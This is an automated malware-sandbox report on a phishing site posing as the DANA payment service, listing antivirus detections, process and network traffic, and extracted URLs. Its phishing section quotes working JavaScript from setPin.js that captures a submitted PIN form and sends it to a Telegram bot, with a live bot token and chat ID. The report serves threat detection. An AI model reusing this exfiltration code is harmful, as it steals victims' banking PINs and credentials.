Edit tour

Windows Analysis Report
http://pengajuan-kartufisik.netlify.app/

Overview

General Information

Sample URL:http://pengajuan-kartufisik.netlify.app/
Analysis ID:1520064
Infos:

Detection

Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Javascript uses Telegram API
Detected non-DNS traffic on DNS port

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64
  • chrome.exe (PID: 4896 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
    • chrome.exe (PID: 1672 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2376 --field-trial-handle=2312,i,10656444654426491281,9200762998482847054,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • chrome.exe (PID: 5712 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://pengajuan-kartufisik.netlify.app/" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: http://pengajuan-kartufisik.netlify.app/Avira URL Cloud: detection malicious, Label: phishing
Source: http://pengajuan-kartufisik.netlify.app/SlashNext: detection malicious, Label: Fraudulent Website type: Phishing & Social usering
Source: https://pengajuan-kartufisik.netlify.app/setPin.jsAvira URL Cloud: Label: phishing
Source: pengajuan-kartufisik.netlify.appVirustotal: Detection: 17%Perma Link
Source: http://pengajuan-kartufisik.netlify.app/Virustotal: Detection: 17%Perma Link

Phishing

barindex
Source: https://pengajuan-kartufisik.netlify.app/setPin.jsHTTP Parser: const chat_id = '5819877962', botid = 'bot6741785240:aae9hp_2lekocgjrewxnkrgiegxvsha-hpk'; const telegramurl = `https://api.telegram.org/${botid}/sendmessage`; document.queryselector('#setpin').addeventlistener("submit", async e => { // when the user submits the form e.preventdefault(); // don't submit let text = json.stringify( // convert the form data to a string to send as our telegram message object.fromentries(new formdata(e.target).entries()), // convert the form data to an object. null, 2); // prettify the json so we can read the data easily const sendmessage = await fetch(telegramurl, { // send the request to the telegram api method: 'post', headers: {"content-type": "application/json"}, // this is required when sending a json body. body: json.stringify({chat_id, text}), // the body must be a string, not an object }); const messagestatus = document.queryselector('#status'); ...
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49735 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49747 version: TLS 1.2
Source: global trafficTCP traffic: 192.168.2.6:58909 -> 1.1.1.1:53
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: pengajuan-kartufisik.netlify.appConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /bootstrap/3.3.5/css/bootstrap.min.css HTTP/1.1Host: maxcdn.bootstrapcdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://pengajuan-kartufisik.netlify.app/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /npm/slick-carousel@1.8.1/slick/slick.css HTTP/1.1Host: cdn.jsdelivr.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://pengajuan-kartufisik.netlify.app/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /npm/slick-carousel@1.8.1/slick/slick-theme.css HTTP/1.1Host: cdn.jsdelivr.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://pengajuan-kartufisik.netlify.app/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ionicons/2.0.1/css/ionicons.min.css HTTP/1.1Host: code.ionicframework.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://pengajuan-kartufisik.netlify.app/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /npm/bootstrap@5.2.0-beta1/dist/css/bootstrap.min.css HTTP/1.1Host: cdn.jsdelivr.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://pengajuan-kartufisik.netlify.appsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: styleReferer: https://pengajuan-kartufisik.netlify.app/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /npm/slick-carousel@1.8.1/slick/slick.min.js HTTP/1.1Host: cdn.jsdelivr.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://pengajuan-kartufisik.netlify.app/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /npm/bootstrap@5.2.0-beta1/dist/js/bootstrap.bundle.min.js HTTP/1.1Host: cdn.jsdelivr.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://pengajuan-kartufisik.netlify.appsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://pengajuan-kartufisik.netlify.app/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/jquery/3.5.1/jquery.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://pengajuan-kartufisik.netlify.app/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /setPin.js HTTP/1.1Host: pengajuan-kartufisik.netlify.appConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://pengajuan-kartufisik.netlify.app/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /fpXTF6b/danaa-4lt.jpg HTTP/1.1Host: i.ibb.coConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pengajuan-kartufisik.netlify.app/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /khmXKS2/logo-ojk.png HTTP/1.1Host: i.ibb.coConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pengajuan-kartufisik.netlify.app/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /C1f1Y0C/logo-lps.png HTTP/1.1Host: i.ibb.coConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pengajuan-kartufisik.netlify.app/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /npm/slick-carousel@1.8.1/slick/ajax-loader.gif HTTP/1.1Host: cdn.jsdelivr.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://cdn.jsdelivr.net/npm/slick-carousel@1.8.1/slick/slick-theme.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /npm/slick-carousel@1.8.1/slick/fonts/slick.woff HTTP/1.1Host: cdn.jsdelivr.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://pengajuan-kartufisik.netlify.appsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://cdn.jsdelivr.net/npm/slick-carousel@1.8.1/slick/slick-theme.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/jquery/3.5.1/jquery.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /fpXTF6b/danaa-4lt.jpg HTTP/1.1Host: i.ibb.coConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /C1f1Y0C/logo-lps.png HTTP/1.1Host: i.ibb.coConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /khmXKS2/logo-ojk.png HTTP/1.1Host: i.ibb.coConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /setPin.js HTTP/1.1Host: pengajuan-kartufisik.netlify.appConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: pengajuan-kartufisik.netlify.appConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficDNS traffic detected: DNS query: pengajuan-kartufisik.netlify.app
Source: global trafficDNS traffic detected: DNS query: a.m.dana.id
Source: global trafficDNS traffic detected: DNS query: app.link
Source: global trafficDNS traffic detected: DNS query: api2.branch.io
Source: global trafficDNS traffic detected: DNS query: code.ionicframework.com
Source: global trafficDNS traffic detected: DNS query: maxcdn.bootstrapcdn.com
Source: global trafficDNS traffic detected: DNS query: cdn.jsdelivr.net
Source: global trafficDNS traffic detected: DNS query: i.ibb.co
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: cdn.lr-ingest.io
Source: global trafficDNS traffic detected: DNS query: sentry.io
Source: global trafficDNS traffic detected: DNS query: youtube.com
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: www.dana.id
Source: chromecache_78.2.drString found in binary or memory: http://creativecommons.org/licenses/by/4.0/
Source: chromecache_79.2.drString found in binary or memory: http://getbootstrap.com)
Source: chromecache_78.2.drString found in binary or memory: http://ionicons.com/
Source: chromecache_64.2.drString found in binary or memory: https://a.m.dana.id
Source: chromecache_64.2.drString found in binary or memory: https://a.m.dana.id/danaweb/promo/1675835033-BRI-GPN-2023-Q1-Top-Up-Thumbnail.png
Source: chromecache_64.2.drString found in binary or memory: https://a.m.dana.id/danaweb/promo/1678877820-Thumbnail---DANA-Deals__2_.png
Source: chromecache_64.2.drString found in binary or memory: https://a.m.dana.id/danaweb/web/dana-meta-logo.png
Source: chromecache_64.2.drString found in binary or memory: https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js
Source: chromecache_67.2.dr, chromecache_66.2.drString found in binary or memory: https://api.telegram.org/$
Source: chromecache_64.2.drString found in binary or memory: https://api2.branch.io
Source: chromecache_64.2.drString found in binary or memory: https://app.link
Source: chromecache_64.2.drString found in binary or memory: https://cdn.jsdelivr.net/npm/bootstrap
Source: chromecache_64.2.drString found in binary or memory: https://cdn.jsdelivr.net/npm/slick-carousel
Source: chromecache_64.2.drString found in binary or memory: https://cdn.lr-ingest.io
Source: chromecache_64.2.drString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/jquery/3.5.1/jquery.min.js
Source: chromecache_64.2.drString found in binary or memory: https://code.ionicframework.com/ionicons/2.0.1/css/ionicons.min.css
Source: chromecache_64.2.drString found in binary or memory: https://fonts.googleapis.com/css2?family=Open
Source: chromecache_89.2.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsjr0B4gaVI
Source: chromecache_89.2.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsjr0B4iaVI
Source: chromecache_89.2.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsjr0B4jaVI
Source: chromecache_89.2.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsjr0B4kaVI
Source: chromecache_89.2.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsjr0B4saVI
Source: chromecache_89.2.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsjr0B4taVI
Source: chromecache_89.2.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsjr0B4uaVI
Source: chromecache_89.2.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsjr0B4vaVI
Source: chromecache_89.2.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsjr0B5OaVI
Source: chromecache_89.2.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsjr0B5caVI
Source: chromecache_59.2.dr, chromecache_87.2.dr, chromecache_63.2.drString found in binary or memory: https://getbootstrap.com/)
Source: chromecache_78.2.drString found in binary or memory: https://github.com/driftyco/ionicons
Source: chromecache_78.2.drString found in binary or memory: https://github.com/google/material-design-icons
Source: chromecache_59.2.dr, chromecache_87.2.dr, chromecache_63.2.drString found in binary or memory: https://github.com/twbs/bootstrap/blob/main/LICENSE)
Source: chromecache_79.2.drString found in binary or memory: https://github.com/twbs/bootstrap/blob/master/LICENSE)
Source: chromecache_87.2.dr, chromecache_63.2.drString found in binary or memory: https://github.com/twbs/bootstrap/graphs/contributors)
Source: chromecache_64.2.drString found in binary or memory: https://i.ibb.co/C1f1Y0C/logo-lps.png
Source: chromecache_64.2.drString found in binary or memory: https://i.ibb.co/fpXTF6b/danaa-4lt.jpg
Source: chromecache_64.2.drString found in binary or memory: https://i.ibb.co/khmXKS2/logo-ojk.png
Source: chromecache_64.2.drString found in binary or memory: https://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/css/bootstrap.min.css
Source: chromecache_64.2.drString found in binary or memory: https://sentry.io
Source: chromecache_78.2.drString found in binary or memory: https://twitter.com/benjsperry
Source: chromecache_78.2.drString found in binary or memory: https://twitter.com/ionicframework
Source: chromecache_64.2.drString found in binary or memory: https://www.dana.id/favicon.ico
Source: chromecache_64.2.drString found in binary or memory: https://youtube.com
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58912 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58912
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
